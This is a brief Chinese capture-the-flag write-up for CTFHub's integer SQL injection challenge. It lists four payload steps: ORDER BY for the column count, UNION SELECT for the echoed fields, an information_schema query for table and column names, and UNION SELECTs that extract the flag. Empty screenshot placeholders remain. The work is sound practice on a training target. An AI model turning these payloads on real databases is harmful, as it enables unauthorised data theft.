CTFHub SQL 整數型注入【最快四步】

嚶嚶怪luminous_you發表於2020-12-04

判斷列數

1 order by 2 

判斷回顯點

1 union select 1,2

判斷表名列名

-1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database()

在這裡插入圖片描述

得出結果【兩種方法】

-1 union select 1,flag from sqli.flag limit 0,1
-1 union select 1,(select flag from sqli.flag limit 0,1)

在這裡插入圖片描述

在這裡插入圖片描述